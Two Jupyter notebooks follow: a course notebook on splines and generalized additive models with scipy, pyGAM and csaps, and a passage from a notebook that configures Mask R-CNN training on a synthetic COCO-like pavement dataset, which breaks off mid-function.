Table of Contents * 1 - Overview - A Top View of LMs, GLMs, and GAMs to set the stage * 2 - Splines * 3 - Generalized Additive Models with `pyGAM` * 4 - Smoothing Splines using `csaps` * 5 - Penalized B-splines 1 - Overview *image source: Dani Servén Marín (one of the developers of pyGAM)* A - Linear Models First we have the **Linear Models** which you know from 109a. These models are linear in the coefficients. Very *interpretable*, but they suffer from high bias because, let's face it, few relationships in life are linear. Simple Linear Regression (defined as a model with one predictor) as well as Multiple Linear Regression (more than one predictor) are examples of LMs. Polynomial Regression extends the linear model by adding terms that are still linear in the coefficients but non-linear when it comes to the predictors, which are now raised to a power or multiplied together.$$\begin{aligned}y = \beta_0 + \beta_1{x_1} & \quad \mbox{(simple linear regression)}\\y = \beta_0 + \beta_1{x_1} + \beta_2{x_2} + \beta_3{x_3} & \quad \mbox{(multiple linear regression)}\\y = \beta_0 + \beta_1{x_1} + \beta_2{x_1^2} + \beta_3{x_3^3} & \quad \mbox{(polynomial multiple regression)}\\\end{aligned}$$ Questions to think about - What does it mean for a model to be **interpretable**? - Are linear regression models interpretable? Are random forests? What about Neural Networks such as Feed Forward? - Do we always want interpretability? Describe cases where we do and cases where we do not care. B - Generalized Linear Models (GLMs) **Generalized Linear Models** is a term coined in the early 1970s by Nelder and Wedderburn for a class of models that includes both Linear Regression and Logistic Regression. A GLM fits one coefficient per feature (predictor). C - Generalized Additive Models (GAMs) Hastie and Tibshirani coined the term **Generalized Additive Models** in 1986 for a class of non-linear extensions to Generalized Linear Models.$$\begin{aligned}y = \beta_0 + f_1\left(x_1\right) + f_2\left(x_2\right) + f_3\left(x_3\right) \\y = \beta_0 + f_1\left(x_1\right) + f_2\left(x_2, x_3\right) + f_3\left(x_3\right) & \mbox{(with interaction terms)}\end{aligned}$$ In practice we add splines and regularization via smoothing penalties to our GLMs. *image source: Dani Servén Marín* D - Basis Functions In our models we can use various types of functions as "basis": - Monomials such as $x^2$, $x^4$ (**Polynomial Regression**) - Sigmoid functions (neural networks) - Fourier functions - Wavelets - Regression splines - Smoothing splines 2 - Piecewise Polynomials a.k.a. Splines Splines are a type of piecewise polynomial interpolant. A spline of degree k is a piecewise polynomial that is continuously differentiable k − 1 times. Splines are the basis of CAD software and vector graphics, including a lot of the fonts used on your computer. The name "spline" comes from a tool used by ship designers to draw smooth curves. Here is the letter $\epsilon$ written with splines: *font idea inspired by Chris Rycroft (AM205)* If the degree is 1 then we have a Linear Spline. If it is 3 then we have a Cubic Spline. It turns out that cubic splines, because they have a continuous 2nd derivative (curvature) at the knots, are very smooth to the eye. We do not need a higher order than that. The Cubic Splines are usually Natural Cubic Splines, which means they have the added constraint that the second derivative equals 0 at the end points. We will use the CubicSpline and the B-Spline as well as the Linear Spline. 
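As a quick, hedged preview of the natural boundary condition (the data below are made up purely for illustration), scipy's `CubicSpline` accepts `bc_type='natural'` to enforce zero second derivatives at the end points:

```python
import numpy as np
from scipy.interpolate import CubicSpline

# toy data for illustration only (same Runge-type function used later in this notebook)
x = np.linspace(-1, 1, 7)
y = 1 / (1 + 25 * x**2)

# 'natural' boundary conditions: the second derivative is zero at both end points
natural_spline = CubicSpline(x, y, bc_type='natural')

xx = np.linspace(-1, 1, 200)
yy = natural_spline(xx)  # evaluate the natural cubic spline on a fine grid
```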
scipy.interpolateSee all the different splines that scipy.interpolate has to offer: https://docs.scipy.org/doc/scipy/reference/interpolate.html. These routines are based on the FORTRAN library FITPACK written in the '70s.Let's use the simplest form, which is to interpolate a set of points and then evaluate points in between them.
###Code
from scipy.interpolate import splrep, splev
from scipy.interpolate import BSpline, CubicSpline
from scipy.interpolate import interp1d
# define the range of the function
a = -1
b = 1
# define the number of knots
num_knots = 11
# define the knots as equally spaced points
knots = np.linspace(a,b,num_knots)
# define the function we want to approximate
y = 1/(1+25*(knots**2))
# make a linear spline
linspline = interp1d(knots, y)
# sample at these points to plot
xx = np.linspace(a,b,1000)
yy = 1/(1+25*(xx**2))
plt.plot(knots,y,'*')
plt.plot(xx, yy, label='true function')
plt.plot(xx, linspline(xx), label='linear spline');
plt.legend();
###Output
_____no_output_____
###Markdown
ExerciseThe linear interpolation does not look very good. Fit a Cubic Spline and plot it alongside the linear spline to compare. Feel free to solve and then look at the solution.
###Code
# your answer here
# solution
# define the range of the function
a = -1
b = 1
# define the knots
num_knots = 10
x = np.linspace(a,b,num_knots)
# define the function we want to approximate
y = 1/(1+25*(x**2))
# make the Cubic spline
cubspline = CubicSpline(x, y)
print(f'Num knots in cubic spline: {num_knots}')
# OR make a linear spline
linspline = interp1d(x, y)
# plot
xx = np.linspace(a,b,10000)
yy = 1/(1+25*(xx**2))
plt.plot(xx, yy, label='true function')
plt.plot(x,y,'*', label='knots')
plt.plot(xx, linspline(xx), label='linear');
plt.plot(xx, cubspline(xx), label='cubic');
plt.legend();
###Output
Num knots in cubic spline: 10
###Markdown
Questions to think about- Change the number of knots to 100 and see what happens. What would happen if we run a polynomial model of degree equal to the number of knots (a global one as in polynomial regression, not a spline)?- What makes a spline 'Natural'?
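Here is an added sketch for the first question (not part of the original notebook); it reuses the Runge function $1/(1+25x^2)$ from the cells above and only assumes `numpy`, `scipy`, and `matplotlib`:

```python
# Sketch: compare one global high-degree polynomial with a cubic spline on the
# Runge function. The global polynomial oscillates wildly near the interval
# ends (Runge's phenomenon); the cubic spline stays well behaved.
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import CubicSpline

num_knots = 20
knots = np.linspace(-1, 1, num_knots)
y = 1 / (1 + 25 * knots**2)

poly_coeffs = np.polyfit(knots, y, deg=num_knots - 1)  # global polynomial through all knots
cubspline = CubicSpline(knots, y)

xx = np.linspace(-1, 1, 1000)
plt.plot(xx, 1 / (1 + 25 * xx**2), label='true function')
plt.plot(xx, np.polyval(poly_coeffs, xx), label=f'degree-{num_knots-1} polynomial')
plt.plot(xx, cubspline(xx), label='cubic spline')
plt.ylim(-1, 2)
plt.legend();
```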
###Code
# Optional and Outside of the scope of this class: create the `epsilon` in the figure above
x = np.array([1.,0.,-1.5,0.,-1.5,0.])
y = np.array([1.5,1.,2.5,3,4,5])
t = np.linspace(0,5,6)
f = interp1d(t,x,kind='cubic')
g = interp1d(t,y,kind='cubic')
tplot = np.linspace(0,5,200)
plt.plot(x,y, '*', f(tplot), g(tplot));
###Output
_____no_output_____
###Markdown
B-Splines (Curry and Schoenberg (1966), further studied by de Boor, 1978)One way to construct a curve given a set of points is to *interpolate the points*, that is, to force the curve to pass through the points.A B-spline (Basis Spline) is defined by a set of **control points** and a set of **basis functions** that fit the function between these points. By choosing to have no smoothing factor we force the final B-spline to pass through all the points. If, on the other hand, we set a smoothing factor, our function is more of an approximation with the control points as "guidance". The latter produces a smoother curve, which is preferable for drawing software. For more on splines see https://en.wikipedia.org/wiki/B-spline or, for a deeper look, *De Boor, C. (1978). A practical guide to splines (Applied mathematical sciences (Springer-Verlag New York Inc.) ; v. 27). New York: Springer-Verlag*.We will use [`scipy.splrep`](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.splrep.html#scipy.interpolate.splrep) to calculate the coefficients for the B-Spline and draw it. B-Spline with no smoothing
###Code
from scipy.interpolate import splev, splrep
x = np.linspace(0, 10, 10)
y = np.sin(x)
# (t,c,k) is a tuple containing the vector of knots, coefficients, degree of the spline
t,c,k = splrep(x, y)
x2 = np.linspace(0, 10, 200)
y2 = BSpline(t,c,k)
plt.plot(x, y, 'o', x2, y2(x2))
plt.plot(t, np.zeros(len(t)), '*', label='knots')
plt.legend()
plt.show()
len(x), t,len(t), len(c), k
from scipy.interpolate import splrep
x = np.linspace(0, 10, 10)
y = np.sin(x)
# (tck) is a tuple containing the vector of knots,
# coefficients, degree of the spline
t,c,k = splrep(x, y, k=3)
# define the points to plot on (x2)
print(f'Knots ({len(t)} of them): {t}\n')
print(f'B-Spline coefficients ({len(c)} of them): {c}\n')
print(f'B-Spline degree {k}')
x2 = np.linspace(0, 10, 100)
y2 = BSpline(t, c, k)
plt.figure(figsize=(10,5))
plt.plot(x, y, 'o', label='true points')
plt.plot(x2, y2(x2), label='B-Spline')
tt = np.zeros(len(t))
plt.plot(t, tt,'g*', label='knots evaluated by the function')
plt.legend()
plt.show()
###Output
Knots (14 of them): [ 0. 0. 0. 0. 2.22222222 3.33333333
4.44444444 5.55555556 6.66666667 7.77777778 10. 10.
10. 10. ]
B-Spline coefficients (14 of them): [-4.94881722e-18 8.96543619e-01 1.39407154e+00 -2.36640266e-01
-1.18324030e+00 -8.16301228e-01 4.57836125e-01 1.48720677e+00
1.64338775e-01 -5.44021111e-01 0.00000000e+00 0.00000000e+00
0.00000000e+00 0.00000000e+00]
B-Spline degree 3
###Markdown
What do the tuple values returned by `scipy.splrep` mean?- The `t` variable is the array that contains the knots' position in the x axis. The length of this array is, of course, the number of knots.- The `c` variable is the array that holds the coefficients for the B-Spline. Its length should be the same as `t`.We have `number_of_knots - 1` B-spline basis elements to the spline constructed via this method, and they are defined as follows:$$\begin{aligned}B_{i, 0}(x) = 1, \textrm{if $t_i \le x < t_{i+1}$, otherwise $0$,} \\ \\B_{i, k}(x) = \frac{x - t_i}{t_{i+k} - t_i} B_{i, k-1}(x) + \frac{t_{i+k+1} - x}{t_{i+k+1} - t_{i+1}} B_{i+1, k-1}(x)\end{aligned}$$ - `t` $\in [t_1, t_2, ..., t_n]$ is the knot vector- `c` : are the spline coefficients- `k` : is the spline degree References: - [All you wanted to know about B-Splines](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.splrep.htmlscipy.interpolate.splrep) and were afraid to ask, or how `scipy.splrep` calculates B-spline representations.- For more on the [basis of B-splines](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.BSpline.html).- [scipy.interpolate.BSpline.basis_element](https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.BSpline.basis_element.htmlscipy.interpolate.BSpline.basis_element).- Inside the documentation you will find references to books.
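As a sanity check of the recursion above, here is an added sketch (not part of the original notebook) that evaluates the Cox–de Boor recursion by hand and compares it with `scipy`'s `BSpline.basis_element` on the same knot vector:

```python
# Added sketch: evaluate the Cox-de Boor recursion directly and compare it
# with scipy's BSpline.basis_element for the same knot vector.
from scipy.interpolate import BSpline

def cox_de_boor(i, k, t, x):
    # Value of the i-th B-spline basis function of degree k on knots t at x
    if k == 0:
        return 1.0 if t[i] <= x < t[i + 1] else 0.0
    left = right = 0.0
    if t[i + k] != t[i]:
        left = (x - t[i]) / (t[i + k] - t[i]) * cox_de_boor(i, k - 1, t, x)
    if t[i + k + 1] != t[i + 1]:
        right = (t[i + k + 1] - x) / (t[i + k + 1] - t[i + 1]) * cox_de_boor(i + 1, k - 1, t, x)
    return left + right

t = [0, 1, 2, 3, 4]            # knot vector
b3 = BSpline.basis_element(t)  # degree inferred as len(t) - 2 = 3
for x in [0.5, 1.5, 2.0, 3.7]:
    print(x, cox_de_boor(0, 3, t, x), float(b3(x)))
```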
###Code
from scipy.interpolate import splev, splrep
from scipy.interpolate import BSpline
###Output
_____no_output_____
###Markdown
Constructing the B-spline basis elementsThe degree of the B-spline, `k`, is inferred from the length of `t` as `len(t)-2`. The knot vector is constructed by appending and prepending `k+1` elements to the internal knots `t`.a) The first element is a B-spline of degree $d=0$ with $2$ knots (min number of knots = $d+2$): $B_{i, 0}(x) = 1, \textrm{if $t_i \le x < t_{i+1}$, otherwise $0$ (0 interior knots, 2 total)}$b) The second element is a B-spline of degree $d=1$ with $3$ knots: $B_{i, 1}(x)$, built from two degree-0 elements via the recursion above (1 interior knot, 3 total)and so on ...
###Code
b0 = BSpline.basis_element([0,1]) # two knots are the boundary nodes with 0 internal knots
b1 = BSpline.basis_element([0,1,2])
b2 = BSpline.basis_element([0,1,2,3])
b3 = BSpline.basis_element([0,1,2,3,4])
print(f'Knots for b3 = {b3.t[3:-3]}')
# B-splines add knots before and after the boundaries for better construction.
print(f'Augmented knots for b3 = {b3.t}')
fig, ax = plt.subplots()
x0 = np.linspace(0, 1, 50)
x1 = np.linspace(0, 2, 50)
x2 = np.linspace(0, 3, 50)
x3 = np.linspace(0, 4, 50)
ax.set_xlim(0,5);
ax.set_title(f'degree of basis : {b0.k}')
ax.plot(x0, b0(x0), 'g', label=f'B-element d={b0.k}', lw=3);
ax.plot(x1, b1(x1), 'brown', label=f'B-element d={b1.k}', lw=3);
ax.plot(x2, b2(x2), 'black', label=f'B-element d={b2.k}', lw=3);
ax.plot(x3, b3(x3), 'blue', label=f'B-element d={b3.k}', lw=3);
ax.legend();
###Output
Knots for b3 = [0. 1. 2. 3. 4.]
Augmented knots for b3 = [-1. -1. -1. 0. 1. 2. 3. 4. 5. 5. 5.]
###Markdown
B-Spline with smoothing factor s
###Code
x = np.linspace(0, 10, 5)
y = np.sin(x)
s = 0.1 # add smoothing factor
# task needs to be set to 0, which represents:
# we are specifying a smoothing factor and thus only want
# splrep() to find the optimal t and c
task = 0
t,c,k = splrep(x, y, task=task, s=s)
print(f'Knots ({len(t)}): {t}, {k}')
# draw the line segments
linspline = interp1d(x, y)
# define the points to plot on (x2)
x2 = np.linspace(0, 10, 200)
y2 = BSpline(t, c, k)
plt.plot(x, y, 'o', x2, y2(x2), label='data')
plt.plot(x2, linspline(x2), label='linear interpolation')
# +0.2 perturbs the line for visibility
plt.plot(x2, y2(x2)+0.2, 'blue', label='B-spline(moved)')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
B-Spline with given knots
###Code
x = np.linspace(0, 10, 100)
y = np.sin(x)
# ‘quantile’ knot sequence: the interior knots are the quantiles from the empirical
# distribution of the underlying variable. Quantile knots guarantee that each
# interval contains an equal number of sample observations
knots = np.quantile(x, [0.25, 0.5, 0.75])
print(knots)
# calculate the B-Spline
t,c,k = splrep(x, y, t=knots)
t
curve = BSpline(t,c,k)
curve
plt.scatter(x=x,y=y,c='grey', alpha=0.4)
yknots = np.sin(knots)
#plt.scatter(knots, yknots, c='r')
plt.scatter(knots, np.zeros(len(yknots)), c='r')
plt.plot(x,curve(x))
plt.show()
###Output
_____no_output_____
###Markdown
3 - GAMshttps://readthedocs.org/projects/pygam/downloads/pdf/latest/ Classification in `pyGAM`Let's get our (multivariate!) data, the `kyphosis` dataset, and the `LogisticGAM` model from `pyGAM` to do binary classification.- kyphosis - whether a particular deformation was present post-operation- age - patient's age in months- number - the number of vertebrae involved in the operation- start - the number of the topmost vertebrae operated on
###Code
kyphosis = pd.read_csv("../data/kyphosis.csv")
display(kyphosis.head())
display(kyphosis.describe(include='all'))
display(kyphosis.dtypes)
# convert the outcome in a binary form, 1 or 0
kyphosis = pd.read_csv("../data/kyphosis.csv")
kyphosis["outcome"] = 1*(kyphosis["Kyphosis"] == "present")
kyphosis.describe()
kyphosis
from pygam import LogisticGAM, s, f, l
X = kyphosis[["Age","Number","Start"]]
y = kyphosis["outcome"]
kyph_gam = LogisticGAM().fit(X,y)
###Output
_____no_output_____
###Markdown
Outcome dependence on featuresTo help us see how the outcome depends on each feature, `pyGAM` has the `partial_dependence()` function.``` pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)```For more on this see: https://pygam.readthedocs.io/en/latest/api/logisticgam.html
###Code
res = kyph_gam.deviance_residuals(X,y)
for i, term in enumerate(kyph_gam.terms):
if term.isintercept:
continue
XX = kyph_gam.generate_X_grid(term=i)
pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)
pdep2, _ = kyph_gam.partial_dependence(term=i, X=X, width=0.95)
plt.figure()
plt.scatter(X.iloc[:,term.feature], pdep2 + res)
plt.plot(XX[:, term.feature], pdep)
plt.plot(XX[:, term.feature], confi, c='r', ls='--')
plt.title(X.columns.values[term.feature])
plt.show()
###Output
_____no_output_____
###Markdown
Notice that we did not specify the basis functions in the .fit(). `pyGAM` figures them out for us by using $s()$ (splines) for numerical variables and $f()$ for categorical features. If this is not what we want we can manually specify the basis functions, as follows:
###Code
kyph_gam = LogisticGAM(s(0)+s(1)+s(2)).fit(X,y)
res = kyph_gam.deviance_residuals(X,y)
for i, term in enumerate(kyph_gam.terms):
if term.isintercept:
continue
XX = kyph_gam.generate_X_grid(term=i)
pdep, confi = kyph_gam.partial_dependence(term=i, X=XX, width=0.95)
pdep2, _ = kyph_gam.partial_dependence(term=i, X=X, width=0.95)
plt.figure()
plt.scatter(X.iloc[:,term.feature], pdep2 + res)
plt.plot(XX[:, term.feature], pdep)
plt.plot(XX[:, term.feature], confi, c='r', ls='--')
plt.title(X.columns.values[term.feature])
plt.show()
###Output
_____no_output_____
###Markdown
Regression in `pyGAM`For regression problems, we can use a `LinearGAM` model. For this part we will use the `wages` dataset.https://pygam.readthedocs.io/en/latest/api/lineargam.html The `wages` datasetLet's inspect another dataset that is included in `pyGAM`, which records the wages of people based on their age, year of employment and education.
###Code
# from the pyGAM documentation
from pygam import LinearGAM, s, f
from pygam.datasets import wage
X, y = wage(return_X_y=True)
## model
gam = LinearGAM(s(0) + s(1) + f(2))
gam.gridsearch(X, y)
## plotting
plt.figure();
fig, axs = plt.subplots(1,3);
titles = ['year', 'age', 'education']
for i, ax in enumerate(axs):
XX = gam.generate_X_grid(term=i)
ax.plot(XX[:, i], gam.partial_dependence(term=i, X=XX))
ax.plot(XX[:, i], gam.partial_dependence(term=i, X=XX, width=.95)[1], c='r', ls='--')
if i == 0:
ax.set_ylim(-30,30)
ax.set_title(titles[i]);
###Output
100% (11 of 11) |########################| Elapsed Time: 0:00:00 Time: 0:00:00
###Markdown
4 - Smoothing Splines using csapsA smoothing spline is the solution to the problem of balancing *goodness-of-fit* against *wiggliness*: we minimize $\text{MSE} + \lambda\cdot\text{wiggle penalty}$, written here as $p\sum_{i=1}^N \left(y_i - f(x_i)\right)^2 + (1-p) \int \left(f''(t)\right)^2 dt$, across all possible functions $f$. The smoothing parameter p is in the range [0,1]: p = 0 gives the least-squares straight-line fit to the data, and p = 1 gives the natural cubic spline interpolant.
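To see the two extremes of p described above, here is a small added sketch (not from the original notebook) using the same `csaps` call as the next cell, where the `smooth` argument plays the role of p:

```python
# Added sketch: smooth=0 gives the least-squares straight line,
# smooth=1 gives the natural cubic spline interpolant through the data.
import numpy as np
import matplotlib.pyplot as plt
from csaps import csaps

x = np.linspace(0, 10, 20)
y = np.sin(x) + 0.2 * np.random.randn(len(x))
xs = np.linspace(0, 10, 500)

plt.plot(x, y, 'o', label='data')
plt.plot(xs, csaps(x, y, xs, smooth=0.0), label='smooth=0 (straight line)')
plt.plot(xs, csaps(x, y, xs, smooth=1.0), label='smooth=1 (interpolant)')
plt.legend();
```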
###Code
from csaps import csaps
np.random.seed(1234)
x = np.linspace(0,10,300000)
y = np.sin(x*2*np.pi)*x + np.random.randn(len(x))
xs = np.linspace(x[0], x[-1], 1000)
ys = csaps(x, y, xs, smooth=0.99)
print(ys.shape)
plt.plot(x, y, 'o', xs, ys, '-')
plt.show()
###Output
(1000,)
###Markdown
5 - Data fitting using pyGAM and Penalized B-SplinesWhen we use a spline in pyGAM we are effectively using a penalized B-Spline with a regularization parameter $\lambda$. E.g. ```LogisticGAM(s(0)+s(1, lam=0.5)+s(2)).fit(X,y) ``` Let's see how this smoothing works in `pyGAM`. We start by creating some arbitrary data and fitting them with a GAM. The lambda parameter (lam) goes from 0 to infinity; the default for `LinearGAM` is 0.6.
###Code
X = np.linspace(0,10,500)
y = np.sin(X*2*np.pi)*X + np.random.randn(len(X))
plt.scatter(X,y);
# let's try a large lambda first and lots of splines
gam = LinearGAM(lam=1e6, n_splines=50).fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
We see that the large $\lambda$ forces a straight line, no flexibility. Let's see now what happens if we make it smaller.
###Code
# let's try a smaller lambda
gam = LinearGAM(lam=1e2, n_splines=50).fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
There is some curvature there but still not a good fit. Let's try no penalty. That should have the line fit exactly.
###Code
# no penalty, let's try a 0 lambda
gam = LinearGAM(lam=0, n_splines=50).fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3)
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____
###Markdown
Yes, that is good. Now let's see what happens if we lessen the number of splines. The fit should not be as good.
###Code
# no penalty, let's try a 0 lambda
gam = LinearGAM(lam=0, n_splines=10).fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
# and finally the defaults: lam=0.6 and the default number of splines
gam = LinearGAM().fit(X,y)
XX = gam.generate_X_grid(term=0)
plt.scatter(X,y,alpha=0.3);
plt.plot(XX, gam.predict(XX));
###Output
_____no_output_____ |
samples/pavement/train/train_mask_rcnn.ipynb | ###Markdown
Mask R-CNN Training and InferenceIn this notebook we use Matterport's implementation of Mask R-CNN to train on our synthetic dataset, then use the trained weights to run inference on new images.If you've never trained a neural network before, I wouldn't recommend starting here. Find a beginner deep learning tutorial/course and start there. I'd suggest the free course at https://course.fast.ai/. There are also lots of great free tutorials on YouTube, as well as paid courses on Udemy, Udacity, Coursera, etc. TensorFlow GPUYou definitely want TensorFlow GPU installed to run this notebook. Installation instructions are here:https://www.tensorflow.org/install/gpuThis includes installing CUDA, which is no small task. If you want to do serious image recognition, you just have to push through the pain.When I created this notebook, I updated my graphics driver to the latest, then installed the CUDA Toolkit and CUDNN. Tensorflow tends to not work if you have the wrong combo of CUDA/CUDNN, so I recommend checking out the [tested build configurations](https://www.tensorflow.org/install/sourcetested_build_configurations). It took me a few frustrating hours of searching and trial and error to get a combination that worked. KerasIt seems that the latest versions of Keras aren't compatible with the Mask R-CNN code. Using version 2.2.4 worked for me and other students. My Combo that Worked- **Python 3.6** (conda create -n tf-gpu python=3.6)- **CUDA Toolkit 10.0** [https://developer.nvidia.com/cuda-zone](https://developer.nvidia.com/cuda-zone)- **CUDNN 7.4.1** [https://developer.nvidia.com/cudnn](https://developer.nvidia.com/cudnn)- **tensorflow-gpu 1.13.1** (pip install tensorflow-gpu==1.13.1)- **keras 2.2.4** (pip install keras==2.2.4)
###Code
from google.colab import drive
drive.mount('/content/drive')
%load_ext autoreload
import os
import sys
import json
import numpy as np
import time
from PIL import Image, ImageDraw
from pathlib import Path
###Output
_____no_output_____
###Markdown
Import Matterport's "mrcnn" librariesI'm using Matterport's Mask_RCNN git repo: https://github.com/matterport/Mask_RCNN- Clone the Mask_RCNN repo to your computer.- Update the code cell below to point to the root directory of the repo.- Use pip to install everything from the requirements.txt file in that repo.Read through their documentation and issues if you have any trouble getting started.
###Code
# Set the ROOT_DIR variable to the root directory of the Mask_RCNN git repo
ROOT_DIR = '/content/drive/My Drive/Mask_RCNN-master/'
assert os.path.exists(ROOT_DIR), 'ROOT_DIR does not exist. Did you forget to read the instructions above? ;)'
# Import mrcnn libraries
sys.path.append(ROOT_DIR)
from mrcnn.config import Config
import mrcnn.utils as utils
from mrcnn import visualize
import mrcnn.model as modellib
###Output
_____no_output_____
###Markdown
Set up logging and pre-trained model pathsThis will default to sub-directories in your mask_rcnn_dir, but if you want them somewhere else, update it here.It will also download the pre-trained coco model.
###Code
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
###Output
_____no_output_____
###Markdown
ConfigurationDefine configurations for training on the box_dataset_synthetic dataset.- Look through the code cell below and update any lines relevant to your custom dataset.- You may want to change: - NAME (might want to be more specific) - NUM_CLASSES (always 1 + the number of object categories you have) - IMAGE_MIN_DIM (if you have larger training images) - IMAGE_MAX_DIM (if you have larger training images) - STEPS_PER_EPOCH (if you want to train on more images each epoch) NoteThese are settings that worked on my machine (GTX 970 graphics card). If you are getting OOM (Out of Memory) errors, you may need to tweak the settings or your computer may not be powerful enough. If you have a better graphics card, you will want to tweak it to take advantage of that.
###Code
class CocoSynthConfig(Config):
"""Configuration for training on the box_synthetic dataset.
Derives from the base Config class and overrides specific values.
"""
# Give the configuration a recognizable name
NAME = "cocosynth_dataset"
# Train on 1 GPU and 1 image per GPU. Batch size is 1 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 1
# Number of classes (including background)
    NUM_CLASSES = 1 + 2  # background + 2 object classes
# All of our training images are 512x512
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
# You can experiment with this number to see if it improves training
STEPS_PER_EPOCH = 5000
# This is how often validation is run. If you are using too much hard drive space
# on saved models (in the MODEL_DIR), try making this value larger.
VALIDATION_STEPS = 10
# Matterport originally used resnet101, but I downsized to fit it on my graphics card
BACKBONE = 'resnet50'
RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128)
TRAIN_ROIS_PER_IMAGE = 32
MAX_GT_INSTANCES = 50
POST_NMS_ROIS_INFERENCE = 500
POST_NMS_ROIS_TRAINING = 1000
config = CocoSynthConfig()
config.display()
###Output
Configurations:
BACKBONE resnet50
BACKBONE_STRIDES [4, 8, 16, 32, 64]
BATCH_SIZE 1
BBOX_STD_DEV [0.1 0.1 0.2 0.2]
COMPUTE_BACKBONE_SHAPE None
DETECTION_MAX_INSTANCES 100
DETECTION_MIN_CONFIDENCE 0.7
DETECTION_NMS_THRESHOLD 0.3
FPN_CLASSIF_FC_LAYERS_SIZE 1024
GPU_COUNT 1
GRADIENT_CLIP_NORM 5.0
IMAGES_PER_GPU 1
IMAGE_CHANNEL_COUNT 3
IMAGE_MAX_DIM 512
IMAGE_META_SIZE 15
IMAGE_MIN_DIM 512
IMAGE_MIN_SCALE 0
IMAGE_RESIZE_MODE square
IMAGE_SHAPE [512 512 3]
LEARNING_MOMENTUM 0.9
LEARNING_RATE 0.001
LOSS_WEIGHTS {'rpn_class_loss': 1.0, 'rpn_bbox_loss': 1.0, 'mrcnn_class_loss': 1.0, 'mrcnn_bbox_loss': 1.0, 'mrcnn_mask_loss': 1.0}
MASK_POOL_SIZE 14
MASK_SHAPE [28, 28]
MAX_GT_INSTANCES 50
MEAN_PIXEL [123.7 116.8 103.9]
MINI_MASK_SHAPE (56, 56)
NAME cocosynth_dataset
NUM_CLASSES 3
POOL_SIZE 7
POST_NMS_ROIS_INFERENCE 500
POST_NMS_ROIS_TRAINING 1000
PRE_NMS_LIMIT 6000
ROI_POSITIVE_RATIO 0.33
RPN_ANCHOR_RATIOS [0.5, 1, 2]
RPN_ANCHOR_SCALES (8, 16, 32, 64, 128)
RPN_ANCHOR_STRIDE 1
RPN_BBOX_STD_DEV [0.1 0.1 0.2 0.2]
RPN_NMS_THRESHOLD 0.7
RPN_TRAIN_ANCHORS_PER_IMAGE 256
STEPS_PER_EPOCH 5000
TOP_DOWN_PYRAMID_SIZE 256
TRAIN_BN False
TRAIN_ROIS_PER_IMAGE 32
USE_MINI_MASK True
USE_RPN_ROIS True
VALIDATION_STEPS 10
WEIGHT_DECAY 0.0001
###Markdown
Define the datasetI've attempted to make this generic to any COCO-like dataset. That means if you have another dataset defined in the COCO format, it should work.
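For reference, here is an added sketch (keys inferred from the `load_data()` and `load_mask()` code below; the file name, class name, and coordinates are made up) of the minimal COCO-like structure the loader expects:

```python
# Hypothetical minimal COCO-like annotation dict matching what
# CocoLikeDataset.load_data() reads: 'categories', 'images' and 'annotations'.
minimal_coco = {
    "categories": [
        {"id": 1, "name": "crack"},   # class ids must be >= 1 (0 is reserved for background)
    ],
    "images": [
        {"id": 0, "file_name": "img_0.png", "width": 512, "height": 512},
    ],
    "annotations": [
        {
            "image_id": 0,
            "category_id": 1,
            # one flat [x1, y1, x2, y2, ...] polygon per segmentation entry
            "segmentation": [[10, 10, 100, 10, 100, 100, 10, 100]],
        },
    ],
}
```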
###Code
class CocoLikeDataset(utils.Dataset):
""" Generates a COCO-like dataset, i.e. an image dataset annotated in the style of the COCO dataset.
See http://cocodataset.org/#home for more information.
"""
def load_data(self, annotation_json, images_dir):
""" Load the coco-like dataset from json
Args:
annotation_json: The path to the coco annotations json file
images_dir: The directory holding the images referred to by the json file
"""
# Load json from file
json_file = open(annotation_json)
coco_json = json.load(json_file)
json_file.close()
# Add the class names using the base method from utils.Dataset
source_name = "coco_like"
for category in coco_json['categories']:
class_id = category['id']
class_name = category['name']
if class_id < 1:
print('Error: Class id for "{}" cannot be less than one. (0 is reserved for the background)'.format(class_name))
return
self.add_class(source_name, class_id, class_name)
# Get all annotations
annotations = {}
for annotation in coco_json['annotations']:
image_id = annotation['image_id']
if image_id not in annotations:
annotations[image_id] = []
annotations[image_id].append(annotation)
# Get all images and add them to the dataset
seen_images = {}
for image in coco_json['images']:
image_id = image['id']
if image_id in seen_images:
print("Warning: Skipping duplicate image id: {}".format(image))
else:
seen_images[image_id] = image
try:
image_file_name = image['file_name']
image_width = image['width']
image_height = image['height']
except KeyError as key:
print("Warning: Skipping image (id: {}) with missing key: {}".format(image_id, key))
image_path = os.path.abspath(os.path.join(images_dir, image_file_name))
image_annotations = annotations[image_id]
# Add the image using the base method from utils.Dataset
self.add_image(
source=source_name,
image_id=image_id,
path=image_path,
width=image_width,
height=image_height,
annotations=image_annotations
)
def load_mask(self, image_id):
""" Load instance masks for the given image.
MaskRCNN expects masks in the form of a bitmap [height, width, instances].
Args:
image_id: The id of the image to load masks for
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
image_info = self.image_info[image_id]
annotations = image_info['annotations']
instance_masks = []
class_ids = []
for annotation in annotations:
